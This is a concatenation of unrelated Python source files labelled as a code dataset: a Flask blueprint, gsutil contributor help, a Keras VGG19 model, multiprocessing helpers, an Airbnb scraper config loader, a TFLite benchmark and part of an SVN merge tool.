from ....util.user_session import get_current_user
blueprint = create_blueprint('core_site', __name__)
@blueprint.app_template_global()
def url_for_site_file(filename, **kwargs) -> Optional[str]:
    """Render URL for a static file local to the current site."""
    site_id = getattr(g, 'site_id', None)
    if site_id is not None:
        return url_for('site_file', site_id=site_id, filename=filename, **kwargs)
    # Outside a site context there is no site-local file URL.
    return None
@blueprint.before_app_request
def prepare_request_globals() -> None:
    """Populate the request-global ``g`` object with site, brand, party
    and current-user data before every request."""
    site_id = config.get_current_site_id()
    site = site_service.get_site(site_id)
    g.site_id = site.id
    g.brand_id = site.brand_id
    # A site is not necessarily tied to a party; party_id may stay None.
    party_id = site.party_id
    if party_id is not None:
        g.party = party_service.get_party(party_id)
        party_id = g.party.id
    g.party_id = party_id
    # No specific permissions are required just to look up the current user.
    required_permissions: set[str] = set()
    g.user = get_current_user(required_permissions)
|
nilq/baby-python
|
python
|
from .qtscraper import *
from ._version import __version__
def setup(app):
    """Sphinx extension entry point; delegates to ``qtgallery.setup``.

    :param app: the Sphinx application object
    :return: whatever ``qtgallery.setup`` returns (extension metadata)
    """
    # Deferred import — presumably to avoid importing qtgallery at package
    # import time; confirm against the package layout.
    from .qtgallery import setup
    return setup(app)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about contributing code to gsutil."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>OVERVIEW</B>
We're open to incorporating gsutil code changes authored by users. Here
are some guidelines:
1. Before we can accept code submissions, we have to jump a couple of legal
hurdles. Please fill out either the individual or corporate Contributor
License Agreement:
- If you are an individual writing original source code and you're
sure you own the intellectual property,
then you'll need to sign an individual CLA
(https://cla.developers.google.com/about/google-individual).
- If you work for a company that wants to allow you to contribute your
work to gsutil, then you'll need to sign a corporate CLA
(https://cla.developers.google.com/about/google-corporate)
Follow either of the two links above to access the appropriate CLA and
instructions for how to sign and return it. Once we receive it, we'll
add you to the official list of contributors and be able to accept
your patches.
2. If you found a bug or have an idea for a feature enhancement, we suggest
you check https://github.com/GoogleCloudPlatform/gsutil/issues to see if it
has already been reported by another user. From there you can also
subscribe to updates to the issue by clicking the "Watch thread" button at
the bottom of the page.
3. It's usually worthwhile to send email to gs-team@google.com about your
idea before sending actual code. Often we can discuss the idea and help
propose things that could save you later revision work.
4. We tend to avoid adding command line options that are of use to only
a very small fraction of users, especially if there's some other way
to accommodate such needs. Adding such options complicates the code and
also adds overhead to users having to read through an "alphabet soup"
list of option documentation.
5. While gsutil has a number of features specific to Google Cloud Storage,
it can also be used with other cloud storage providers. We're open to
including changes for making gsutil support features specific to other
providers, as long as those changes don't make gsutil work worse for Google
Cloud Storage. If you do make such changes we recommend including someone
with knowledge of the specific provider as a code reviewer (see below).
6. You can check out the gsutil code from the GitHub repository:
https://github.com/GoogleCloudPlatform/gsutil
To clone a read-only copy of the repository:
git clone git://github.com/GoogleCloudPlatform/gsutil.git
git submodule update --init --recursive
To push your own changes to GitHub, click the Fork button on the
repository page and clone the repository from your own fork.
7. The gsutil git repository uses git submodules to pull in external modules.
After checking out the repository, make sure to also pull the submodules
by entering into the gsutil top-level directory and run:
git submodule update --init --recursive
8. Please make sure to run all tests against your modified code. To
do this, change directories into the gsutil top-level directory and run:
./gsutil test
The above tests take a long time to run because they send many requests to
the production service. The gsutil test command has a -u argument that will
only run unit tests. These run quickly, as they are executed with an
in-memory mock storage service implementation. To run only the unit tests,
run:
./gsutil test -u
If you made changes to boto, please run the boto tests. For these tests you
need to use HMAC credentials (from gsutil config -a), because the current
boto test suite doesn't import the OAuth2 handler. You'll also need to
install some python modules. Change directories into the boto root
directory at third_party/boto and run:
pip install -r requirements.txt
(You probably need to run this command using sudo.)
Make sure each of the individual installations succeeded. If they don't
you may need to run the install command again.
Then ensure your .boto file has HMAC credentials defined (the boto tests
don't load the OAUTH2 plugin), and then change directories into boto's
tests directory and run:
python test.py unit
python test.py -t s3 -t gs -t ssl
9. Please consider contributing test code for your change, especially if the
change impacts any of the core gsutil code (like the gsutil cp command).
10. When it's time to send us code, please use the Rietveld code review tool
rather than simply sending us a code patch. Do this as follows:
- Check out the gsutil code from your fork of the gsutil repository and
apply your changes.
- Download the "upload.py" script from
https://github.com/rietveld-codereview/rietveld
- Run upload.py from your git directory with the changes.
- Click the codereview.appspot.com link it generates, click "Edit Issue",
and add mfschwartz@google.com as a reviewer, and Cc gs-team@google.com.
- Click Publish+Mail Comments.
- Once your changes are accepted, submit a pull request on GitHub and we
will merge your commits.
""")
class CommandOptions(HelpProvider):
    """Additional help about contributing code to gsutil."""
    # TODO: gsutil-beta: Add lint .rc file and linting instructions.
    # Help specification. See help_provider.py for documentation.
    # This provider is purely declarative: it exposes the _DETAILED_HELP_TEXT
    # above under the topic name "dev" and its aliases.
    help_spec = HelpProvider.HelpSpec(
        help_name='dev',
        help_name_aliases=[
            'development', 'developer', 'code', 'mods', 'software'],
        help_type='additional_help',
        help_one_line_summary='Contributing Code to gsutil',
        help_text=_DETAILED_HELP_TEXT,
        subcommand_help_text={},
    )
|
nilq/baby-python
|
python
|
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D
class VGG19(Sequential):
    """VGG19-style convolutional network for 224x224 RGB input with a
    1000-way softmax head, compiled with SGD and categorical cross-entropy.

    NOTE(review): canonical VGG19 (Simonyan & Zisserman) applies a fifth
    MaxPooling after the last conv block before Flatten; this model omits
    it, so Flatten sees a larger feature map — confirm this is intended.
    """
    def __init__(self):
        super().__init__()
        # Block 1: two 64-filter convs + pool.
        self.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu'))
        self.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Block 2: two 128-filter convs + pool.
        self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Block 3: four 256-filter convs + named pool.
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2), name="VGG19_Pool3"))
        # Block 4: four 512-filter convs + pool.
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(MaxPooling2D(pool_size=(2, 2)))
        # Block 5: four 512-filter convs (no pool here — see class NOTE).
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        self.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
        # Classifier head: two 4096-unit FC layers with dropout, then softmax.
        self.add(Flatten())
        self.add(Dense(4096, activation='relu'))
        self.add(Dropout(0.5))
        self.add(Dense(4096, activation='relu'))
        self.add(Dropout(0.5))
        self.add(Dense(1000, activation='softmax'))
        self.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
        self.summary()
|
nilq/baby-python
|
python
|
import sys
import time
import numpy as np
import pandas as pd
import datetime as dt
import multiprocessing as mp
class MultiProcessingFunctions:
    """Static helpers that enable multi-processing over pandas objects.

    Based on the snippets in "Advances in Financial Machine Learning"
    (de Prado), chapter 20.
    """

    def __init__(self):
        pass

    @staticmethod
    def lin_parts(num_atoms, num_threads):
        """Partition a list of atoms into molecules (subsets) of equal size.

        An atom is an indivisible task unit. Reference: Snippet 20.6 (page 308).

        :param num_atoms: (int) total number of atoms
        :param num_threads: (int) number of partitions desired
        :return: (np.ndarray) integer boundaries, length min(threads, atoms)+1
        """
        # Partition of atoms with a single loop.
        parts = np.linspace(0, num_atoms, min(num_threads, num_atoms) + 1)
        parts = np.ceil(parts).astype(int)
        return parts

    @staticmethod
    def nested_parts(num_atoms, num_threads, upper_triangle=False):
        """Partition atoms for nested (triangular) loops so each molecule
        carries roughly equal work. Reference: Snippet 20.5 (page 306).

        :param num_atoms: (int) total number of atoms
        :param num_threads: (int) number of partitions desired
        :param upper_triangle: (bool) make the first rows the heaviest
        :return: (np.ndarray) integer partition boundaries starting at 0
        """
        # BUG FIX: the partition list must start with the boundary 0; the
        # original initialized "parts = []" and then read parts[-1] in the
        # first loop iteration, raising IndexError unconditionally.
        parts = [0]
        num_threads_ = min(num_threads, num_atoms)
        for num in range(num_threads_):
            # Solve the quadratic that equalizes the triangular workload.
            part = 1 + 4 * (parts[-1] ** 2 + parts[-1] + num_atoms * (num_atoms + 1.) / num_threads_)
            part = (-1 + part ** .5) / 2.
            parts.append(part)
        parts = np.round(parts).astype(int)
        if upper_triangle:  # the first rows are heaviest
            parts = np.cumsum(np.diff(parts)[::-1])
            parts = np.append(np.array([0]), parts)
        return parts

    @staticmethod
    def mp_pandas_obj(func, pd_obj, num_threads=24, mp_batches=1, lin_mols=True, **kargs):
        """Parallelize jobs; return a DataFrame or Series.

        Example: df1 = mp_pandas_obj(func, ('molecule', df0.index), 24, **kwds)
        Reference: Snippet 20.7 (page 310).

        :param func: (callable) function to be parallelized
        :param pd_obj: (tuple) Element 0 is the name of the argument used to
            pass the molecule; element 1 is the list of atoms to group
        :param num_threads: (int) number of threads
        :param mp_batches: (int) number of batches
        :param lin_mols: (bool) use linear (True) or nested (False) partitioning
        :param kargs: extra keyword arguments forwarded to func
        :return: (pd.DataFrame | pd.Series | list) combined results
        """
        if lin_mols:
            parts = MultiProcessingFunctions.lin_parts(len(pd_obj[1]), num_threads * mp_batches)
        else:
            parts = MultiProcessingFunctions.nested_parts(len(pd_obj[1]), num_threads * mp_batches)

        jobs = []
        for i in range(1, len(parts)):
            job = {pd_obj[0]: pd_obj[1][parts[i - 1]:parts[i]], 'func': func}
            job.update(kargs)
            jobs.append(job)

        if num_threads == 1:
            out = MultiProcessingFunctions.process_jobs_(jobs)
        else:
            out = MultiProcessingFunctions.process_jobs(jobs, num_threads=num_threads)

        # MODERNIZATION FIX: DataFrame.append/Series.append were removed in
        # pandas 2.0; pd.concat produces the same combined, sorted result.
        if isinstance(out[0], (pd.DataFrame, pd.Series)):
            return pd.concat(out).sort_index()
        return out

    @staticmethod
    def process_jobs_(jobs):
        """Run jobs sequentially, for debugging."""
        out = []
        for job in jobs:
            out_ = MultiProcessingFunctions.expand_call(job)
            out.append(out_)
        return out

    @staticmethod
    def expand_call(kargs):
        """Expand the arguments of a callback function, kargs['func']."""
        func = kargs['func']
        del kargs['func']
        out = func(**kargs)
        return out

    @staticmethod
    def report_progress(job_num, num_jobs, time0, task):
        """Report progress to stderr as asynchronous jobs complete."""
        # msg = [fraction done, minutes elapsed, minutes remaining (est.)]
        msg = [float(job_num) / num_jobs, (time.time() - time0) / 60.]
        msg.append(msg[1] * (1 / msg[0] - 1))
        time_stamp = str(dt.datetime.fromtimestamp(time.time()))
        msg = time_stamp + ' ' + str(round(msg[0]*100, 2)) + '% '+task+' done after ' + \
            str(round(msg[1], 2)) + ' minutes. Remaining ' + str(round(msg[2], 2)) + ' minutes.'
        if job_num < num_jobs:
            sys.stderr.write(msg+'\r')
        else:
            sys.stderr.write(msg+'\n')
        return

    @staticmethod
    def process_jobs(jobs, task=None, num_threads=24):
        """Run jobs in parallel; each job must contain a 'func' callback."""
        if task is None:
            task = jobs[0]['func'].__name__
        pool = mp.Pool(processes=num_threads)
        outputs = pool.imap_unordered(MultiProcessingFunctions.expand_call, jobs)
        out = []
        time0 = time.time()
        # Process asynchronous output, reporting progress as results arrive.
        for i, out_ in enumerate(outputs, 1):
            out.append(out_)
            MultiProcessingFunctions.report_progress(i, len(jobs), time0, task)
        pool.close()
        pool.join()  # this is needed to prevent memory leaks
        return out
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
# ============================================================================
# Airbnb Configuration module, for use in web scraping and analytics
# ============================================================================
import logging
import os
import configparser
import sys
from bnb_kanpora.models import RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel
from playhouse.sqlite_ext import SqliteExtDatabase
MODELS = [RoomModel, SurveyModel, SearchAreaModel, SurveyProgressModel]
logger = logging.getLogger()
class Config():
    """Runtime configuration for the scraper, read from an INI-style file.

    Sets up the database connection, network/proxy settings, survey limits
    and third-party account keys.
    """

    def __init__(self, config_file=None, verbose=False):
        """Read the configuration file <username>.config to set up the run.

        :param config_file: path to the config file (default: "app.config")
        :param verbose: log at DEBUG level when True
        """
        self.config_file = config_file
        self.log_level = logging.DEBUG if verbose else logging.INFO
        # Airbnb endpoint roots.
        self.URL_ROOT = "https://www.airbnb.com/"
        self.URL_ROOM_ROOT = self.URL_ROOT + "rooms/"
        self.URL_HOST_ROOT = self.URL_ROOT + "users/show/"
        self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
        self.SEARCH_LISTINGS_ON_FULL_PAGE = 18
        # Defaults for optional config sections.
        self.HTTP_PROXY_LIST = []
        self.GOOGLE_API_KEY = None
        self.AWS_KEY = None
        self.AWS_SECRET = None
        self.USE_ROTATING_IP = False
        try:
            config = configparser.ConfigParser()
            if self.config_file is None:
                # look for username.config on both Windows (USERNAME) and Linux (USER)
                self.config_file = "app.config"
            if not os.path.isfile(self.config_file):
                logging.error("Configuration file %s not found.", self.config_file)
                sys.exit()
            config.read(self.config_file)
            # database
            try:
                self.database = SqliteExtDatabase(f'{config["DATABASE"]["db_name"]}.db', pragmas=(
                    ('cache_size', -1024 * 64),  # 64MB page-cache.
                    ('journal_mode', 'wal'),  # Use WAL-mode (you should always use this!).
                    ('foreign_keys', 1))  # Enforce foreign-key constraints.
                )
                self.database.bind(MODELS)
                self.database.connect()
                self.database.create_tables(MODELS)
            except Exception:
                logger.error("Incomplete database information in %s: cannot continue",
                             self.config_file)
                sys.exit()
            # network
            try:
                self.HTTP_PROXY_LIST = config["NETWORK"]["proxy_list"].split(",")
                self.HTTP_PROXY_LIST = [x.strip() for x in self.HTTP_PROXY_LIST]
                # Remove any empty strings from the list of proxies
                self.HTTP_PROXY_LIST = [x for x in self.HTTP_PROXY_LIST if x]
            except Exception:
                # BUG FIX: the original called logger.warningf(...), a method
                # that does not exist, raising AttributeError from inside this
                # handler (and aborting configuration) whenever the optional
                # proxy_list setting was missing. The message also lacked its
                # f-prefix, so the file name was never interpolated.
                logger.warning(f"No proxy_list in {self.config_file}: not using proxies")
                self.HTTP_PROXY_LIST = []
            try:
                self.USER_AGENT_LIST = config["NETWORK"]["user_agent_list"].split(",,")
                self.USER_AGENT_LIST = [x.strip() for x in self.USER_AGENT_LIST]
                self.USER_AGENT_LIST = [x.strip('"') for x in self.USER_AGENT_LIST]
            except Exception:
                logger.info(f"No user agent list in {config_file}: not using user-agents")
                self.USER_AGENT_LIST = []
            self.MAX_CONNECTION_ATTEMPTS = int(config["NETWORK"]["max_connection_attempts"])
            self.REQUEST_SLEEP = float(config["NETWORK"]["request_sleep"])
            self.HTTP_TIMEOUT = float(config["NETWORK"]["http_timeout"])
            # The bare "except:" clauses below were narrowed to Exception so
            # SystemExit/KeyboardInterrupt are no longer swallowed.
            try:
                self.URL_API_SEARCH_ROOT = config["NETWORK"]["url_api_search_root"]
            except Exception:
                logger.warning("Missing config file entry: url_api_search_root.")
                logger.warning("For more information, see example.config")
                self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
            try:
                self.API_KEY = config["NETWORK"]["api_key"]
            except Exception:
                logger.warning("Missing config file entry: api_key.")
                logger.warning("For more information, see example.config")
                self.API_KEY = None
            if self.API_KEY is None or self.API_KEY == "":
                # Without an API key, fall back to the plain search endpoint.
                self.URL_API_SEARCH_ROOT = self.URL_ROOT + "s/homes"
            try:
                self.CLIENT_SESSION_ID = config["NETWORK"]["client_session_id"]
            except Exception:
                logger.warning("Missing config file entry: client_session_id.")
                logger.warning("For more information, see example.config")
                self.CLIENT_SESSION_ID = None
            # survey
            self.SEARCH_MAX_PAGES = int(config["SURVEY"]["search_max_pages"])
            self.SEARCH_MAX_GUESTS = int(config["SURVEY"]["search_max_guests"])
            self.RE_INIT_SLEEP_TIME = float(config["SURVEY"]["re_init_sleep_time"])
            # account
            try:
                self.GOOGLE_API_KEY = config["ACCOUNT"]["google_api_key"]
            except Exception:
                logger.warning("Missing config file entry: Google API Key. Needed only for geocoding")
                logger.warning("For more information, see example.config")
            try:
                self.AWS_KEY = config["ACCOUNT"]["aws_key"]
                self.AWS_SECRET = config["ACCOUNT"]["aws_secret"]
            except Exception:
                logger.warning(
                    "Missing config file entry: AWS API Key. Needed only for proxies")
                logger.warning("For more information, see example.config")
        except Exception:
            logger.exception("Failed to read config file properly")
            raise
nilq/baby-python
|
python
|
import _hgdb
class DebugSymbolTableException(Exception):
    """Raised when a symbol-table operation references a missing entity
    (unknown instance/breakpoint/variable id)."""

    def __init__(self, what):
        super().__init__(what)
# wrapper class
class DebugSymbolTable:
    """Thin Python wrapper over the native ``_hgdb`` debug-database API.

    Each method delegates to the corresponding ``_hgdb`` function.  The
    ``store_*`` methods that insert cross-referencing rows first verify that
    the referenced instance/breakpoint/variable exists and raise
    DebugSymbolTableException otherwise.
    """

    def __init__(self, filename):
        # Open (or create) the debug database backing file via the C extension.
        self.db = _hgdb.init_debug_db(filename)

    def store_variable(self, id_: int, value: str, is_rtl: bool = True):
        """Store a variable entry; *is_rtl* marks RTL (vs. source) variables."""
        _hgdb.store_variable(self.db, id_, value, is_rtl)

    def store_breakpoint(self, id_: int, instance_id: int, filename: str, line_num: int, column_num: int = 0,
                         condition: str = "", trigger: str = ""):
        """Store a breakpoint attached to an existing instance.

        Raises:
            DebugSymbolTableException: if *instance_id* is not in the table.
        """
        # check instance id
        if not self.has_instance_id(instance_id):
            raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
        _hgdb.store_breakpoint(self.db, id_, instance_id, filename, line_num, column_num, condition, trigger)

    def store_instance(self, id_: int, full_name: str, annotation: str = ""):
        """Store an instance identified by its full hierarchical name."""
        _hgdb.store_instance(self.db, id_, full_name, annotation)

    def store_scope(self, id_: int, *args: int):
        """Store a scope composed of existing breakpoint ids.

        Raises:
            DebugSymbolTableException: if any breakpoint id is unknown.
        """
        for breakpoint_id in args:
            if not self.has_breakpoint_id(breakpoint_id):
                raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
        _hgdb.store_scope(self.db, id_, *args)

    def store_context_variable(self, name: str, breakpoint_id: int, variable_id: int):
        """Bind an existing variable to an existing breakpoint under *name*."""
        if not self.has_breakpoint_id(breakpoint_id):
            raise DebugSymbolTableException(f"Breakpoint {breakpoint_id} does not exist!")
        if not self.has_variable_id(variable_id):
            raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
        _hgdb.store_context_variable(self.db, name, breakpoint_id, variable_id)

    def store_generator_variable(self, name: str, instance_id: int, variable_id: int, annotation: str = ""):
        """Bind an existing variable to an existing instance under *name*."""
        if not self.has_instance_id(instance_id):
            raise DebugSymbolTableException(f"Instance {instance_id} does not exist!")
        if not self.has_variable_id(variable_id):
            raise DebugSymbolTableException(f"Variable {variable_id} does not exist!")
        _hgdb.store_generator_variable(self.db, name, instance_id, variable_id, annotation)

    # checkers
    def has_instance_id(self, id_):
        """True if an instance row with *id_* exists."""
        return _hgdb.has_instance_id(self.db, id_)

    def has_breakpoint_id(self, id_):
        """True if a breakpoint row with *id_* exists."""
        return _hgdb.has_breakpoint_id(self.db, id_)

    def has_variable_id(self, id_):
        """True if a variable row with *id_* exists."""
        return _hgdb.has_variable_id(self.db, id_)

    # get other information
    def get_filenames(self):
        """Return the filenames known to the database (delegates to _hgdb)."""
        return _hgdb.get_filenames(self.db)

    # transaction based insertion
    def begin_transaction(self):
        return _hgdb.begin_transaction(self.db)

    def end_transaction(self):
        return _hgdb.end_transaction(self.db)
|
nilq/baby-python
|
python
|
# This program takes a csv file of financial data as input and produces
# a statistical report stored to a csv file and printed to the terminal.
# The input file must contain a series of months with corresponding profits
# and losses. The output report includes the total number of months analyzed,
# the net total amount of "Profit/Losses" over the entire period, the average
# of the changes in "Profit/Losses" over the entire period, and the greatest
# increase and greatest decrease in profits (date and amount) over the entire
# period.

import csv
import os

month_list = []
month_count = 0
net_profit = 0
greatest_profit = 0
greatest_loss = 0
# Defaults so the report still renders when the data has no positive (or no
# negative) values; the originals were only bound inside the loop
# conditionals, which risked a NameError.
greatest_profit_info = ["N/A", 0]
greatest_loss_info = ["N/A", 0]
# Month-over-month delta tracking so "average change" matches the spec above
# (the previous version reported average *profit* instead).
previous_profit = None
total_change = 0
change_count = 0

# Store relative path of csv
csvpath = "Resources/budget_data.csv"

# Open csv file, skipping over header row
with open(csvpath) as data_file:
    next(data_file)
    data_rows = csv.reader(data_file, delimiter=',')
    # Loop through csv
    for row in data_rows:
        # Count months by accumulating them into a list (omit any duplicates)
        if row[0] not in month_list:
            month_list.append(row[0])
            month_count += 1
        # Accumulate net profit
        profit = int(row[1])
        net_profit += profit
        # Accumulate changes; a change is defined from the second row onward.
        if previous_profit is not None:
            total_change += profit - previous_profit
            change_count += 1
        previous_profit = profit
        # As greater profits are found, replace current greatest
        if profit > greatest_profit:
            greatest_profit = profit
            greatest_profit_info = [row[0], row[1]]
        # As greater losses are found, replace current greatest
        elif profit < greatest_loss:
            greatest_loss = profit
            greatest_loss_info = [row[0], row[1]]

# Guard against division by zero for an empty/single-row file.
average_change = round(total_change / change_count, 2) if change_count else 0

# Organize results into formatted report
# (typo fix: "decrease inprofit" -> "decrease in profit")
report = f"Total months: {month_count}"\
         f"\nNet profit: {net_profit}"\
         f"\nAverage change: {average_change}"\
         f"\nGreatest increase in profit: {greatest_profit_info[1]} on {greatest_profit_info[0]}"\
         f"\nGreatest decrease in profit: {greatest_loss_info[1]} on {greatest_loss_info[0]}"

# Print report to terminal and new csv file
print(report)
output_directory = "Analysis"
os.makedirs(output_directory, exist_ok=True)  # avoid chdir failure on first run
os.chdir(output_directory)
with open('banking_results.csv', 'w', newline='') as output_file:
    output_file.write(report)
|
nilq/baby-python
|
python
|
import numpy as np
import tensorflow as tf
import time

# Load TFLite model and allocate tensors.
interpreter = tf.lite.Interpreter(model_path="output/model.tflite")
interpreter.allocate_tensors()

# Get input and output tensors.
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()

# Test model FPS on random input data: time 10 consecutive invocations.
input_shape = input_details[0]['shape']
input_data = np.array(np.random.random_sample(input_shape), dtype=np.float32)
start = time.time()
for idx in range(10):
    interpreter.set_tensor(input_details[0]['index'], input_data)
    interpreter.invoke()
    # The function `get_tensor()` returns a copy of the tensor data.
    # Use `tensor()` in order to get a pointer to the tensor.
    output_data = interpreter.get_tensor(output_details[0]['index'])
    print(output_data.shape)
end = time.time()
# Total wall-clock seconds for 10 runs (FPS = 10 / this value).
print(end-start)

# Disabled webcam/video variant kept for reference (requires cv2):
# cap = cv2.VideoCapture('/home/anurag/lightspeed/data/pushup-random.mp4')
# while(cap.isOpened()):
#     ret, frame = cap.read()
#     resized = cv2.resize(frame, (192, 192) , interpolation = cv2.INTER_LINEAR)
#     cv2.imshow('frame', resized)
#     interpreter.set_tensor(input_details[0]['index'], resized)
#     if cv2.waitKey(1) & 0xFF == ord('q'):
#         break
# cap.release()
# cv2.destroyAllWindows()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python2
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import optparse
import os
import re
import sys
import urlparse
import gclient_utils
import subprocess2
USAGE = """
WARNING: Please use this tool in an empty directory
(or at least one that you don't mind clobbering.)
REQUIRES: SVN 1.5+
NOTE: NO NEED TO CHECKOUT ANYTHING IN ADVANCE OF USING THIS TOOL.
Valid parameters:
[Merge from trunk to branch]
--merge <revision> --branch <branch_num>
Example: %(app)s --merge 12345 --branch 187
[Merge from trunk to local copy]
--merge <revision> --local
Example: %(app)s --merge 12345 --local
[Merge from branch to branch]
--merge <revision> --sbranch <branch_num> --branch <branch_num>
Example: %(app)s --merge 12345 --sbranch 248 --branch 249
[Revert from trunk]
--revert <revision>
Example: %(app)s --revert 12345
[Revert from branch]
--revert <revision> --branch <branch_num>
Example: %(app)s --revert 12345 --branch 187
"""
# Module-level caches so repeated queries for the same revision reuse the
# first `svn log`/`svn info` results (populated lazily by the helpers below).
export_map_ = None
files_info_ = None
delete_map_ = None
# Matches one svn status letter (M/A/D/U/C) plus a trunk- or branch-rooted
# path; groups: (status, full repo path, subdir under src, basename).
file_pattern_ = r"[ ]+([MADUC])[ ]+/((?:trunk|branches/.*?)/src(.*)/(.*))"
# Directory containing this script; used to locate the sibling `gcl` tool.
depot_tools_dir_ = os.path.dirname(os.path.abspath(__file__))
def runGcl(subcommand):
    """Run the `gcl` tool (preferring the copy beside this script) with
    *subcommand*; returns the os.system() exit status."""
    gcl_path = os.path.join(depot_tools_dir_, "gcl")
    if not os.path.exists(gcl_path):
        # Fall back to whatever `gcl` is on PATH.
        print "WARNING: gcl not found beside drover.py. Using system gcl instead..."
        gcl_path = 'gcl'
    command = "%s %s" % (gcl_path, subcommand)
    return os.system(command)
def gclUpload(revision, author):
    """Upload the change list for *revision*, setting *author* as reviewer."""
    subcommand = "upload %s --send_mail --no_presubmit --reviewers=%s" % (
        revision, author)
    return runGcl(subcommand)
def getSVNInfo(url, revision):
    """Return `svn info` for url@revision as a {field: value} dict."""
    output = subprocess2.capture(
        ['svn', 'info', '--non-interactive', '%s@%s' % (url, revision)],
        stderr=subprocess2.VOID)
    info = {}
    for line in output.splitlines():
        # Each info line is "Field: value"; keep both sides stripped.
        parts = re.search(r"(.*?):(.*)", line)
        if parts is not None:
            info[parts.group(1).strip()] = parts.group(2).strip()
    return info
def isSVNDirty():
    """True when `svn status` reports anything other than lines starting
    with 'X' (externals) or '?' (unversioned)."""
    status_lines = subprocess2.check_output(['svn', 'status']).splitlines()
    return any(re.search(r"^[^X?]", line) for line in status_lines)
def getAuthor(url, revision):
    """Return the 'Last Changed Author' for url@revision, or None."""
    # dict.get replaces the deprecated has_key()-then-index pair (has_key was
    # removed in Python 3; .get works identically on Python 2).
    return getSVNInfo(url, revision).get("Last Changed Author")
def isSVNFile(url, revision):
    """True if url@revision names a file node in the repository."""
    info = getSVNInfo(url, revision)
    # .get covers both the missing-key and value-comparison steps; replaces
    # the deprecated dict.has_key().
    return info.get("Node Kind") == "file"
def isSVNDirectory(url, revision):
    """True if url@revision names a directory node in the repository."""
    info = getSVNInfo(url, revision)
    # .get covers both the missing-key and value-comparison steps; replaces
    # the deprecated dict.has_key().
    return info.get("Node Kind") == "directory"
def inCheckoutRoot(path):
    """True if *path* is the root of an svn checkout: it has a repository
    root, and its parent directory belongs to a different (or no) root."""
    info = getSVNInfo(path, "HEAD")
    # `in` replaces the deprecated dict.has_key() (removed in Python 3).
    if "Repository Root" not in info:
        return False
    repo_root = info["Repository Root"]
    parent_info = getSVNInfo(os.path.dirname(os.path.abspath(path)), "HEAD")
    return parent_info.get("Repository Root", None) != repo_root
def getRevisionLog(url, revision):
    """Return the commit message of *revision* at *url* with the `svn log`
    header and trailing separator stripped."""
    log_lines = subprocess2.check_output(
        ['svn', 'log', url, '-r', str(revision)],
        universal_newlines=True).splitlines(True)
    # Drop the three header lines and the trailing "----..." line.
    return ''.join(log_lines[3:-1])
def getSVNVersionInfo():
    """Parse `svn --version`; return a dict with 'version' (string) and
    integer 'major'/'minor'/'patch', or None if the banner is unparseable."""
    banner = subprocess2.check_output(['svn', '--version']).splitlines()
    for line in banner:
        m = re.search(r"svn, version ((\d+)\.(\d+)\.(\d+))", line)
        if not m:
            continue
        return {
            'version': m.group(1),
            'major': int(m.group(2)),
            'minor': int(m.group(3)),
            'patch': int(m.group(4)),
        }
    return None
def isMinimumSVNVersion(major, minor, patch=0):
    """Test whether the installed svn is at least major.minor.patch."""
    version = getSVNVersionInfo()
    return _isMinimumSVNVersion(version, major, minor, patch)
def _isMinimumSVNVersion(version, major, minor, patch=0):
"""Test for minimum SVN version, internal method"""
if not version:
return False
if (version['major'] > major):
return True
elif (version['major'] < major):
return False
if (version['minor'] > minor):
return True
elif (version['minor'] < minor):
return False
if (version['patch'] >= patch):
return True
else:
return False
def checkoutRevision(url, revision, branch_url, revert=False, pop=True):
    """Build a sparse checkout of *branch_url* covering only the paths that
    *revision* of *url* touched.

    revert: also pull in files added by the revision (so they can later be
        deleted); otherwise newly-added directories are skipped.
    pop: drop the leading path component ('trunk' or 'branches/NNN') when
        mapping repository paths onto the working copy.
    """
    files_info = getFileInfo(url, revision)
    paths = getBestMergePaths2(files_info, revision)
    export_map = getBestExportPathsMap2(files_info, revision)
    command = 'svn checkout -N ' + branch_url
